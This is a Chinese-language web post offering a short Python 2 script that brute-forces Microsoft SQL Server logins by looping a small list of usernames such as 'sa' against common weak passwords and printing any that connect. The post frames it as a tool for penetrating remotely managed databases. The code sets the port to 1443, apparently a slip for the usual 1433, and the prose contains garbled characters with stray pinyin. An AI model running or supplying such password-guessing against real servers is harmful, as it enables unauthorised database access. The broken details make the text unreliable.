Python版Mssql爆破小腳本
Mssql Python版本爆破小腳本,需要安裝 MSSQL-python.exe 可以看出代碼量很少,用法:保存代碼為MssqlDatabaseBlasting.py,cmd切換到 MssqlDatabaseBlasting.py路徑下,并 執(zhí)行 MssqlDatabaseBlasting.py即可開始破解
import pymssql common_weak_password = ('','123456','test','root','admin','user')#密碼字典 mssql_username = ('sa', 'test', 'admin', 'mssql')#賬號(hào)字典 success = False host = "127.0.0.1"#數(shù)據(jù)庫IP地址 port = 1443 for username in mssql_username: for password in common_weak_password: try: db = pymssql.connect(server=host, port=port, user=username, password=password) success = True if success: print username, password except Exception, e: pass
說明:看到很多網(wǎng)絡(luò)安全愛好者,在進(jìn)行滲透測試的時(shí)候,遇到數(shù)據(jù)庫可以遠(yuǎn)程管理,但是無法破解其賬號(hào)密碼,所以此篇文章就推送幾個(gè)腳本進(jìn)行滲透。
版權(quán)聲明:本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。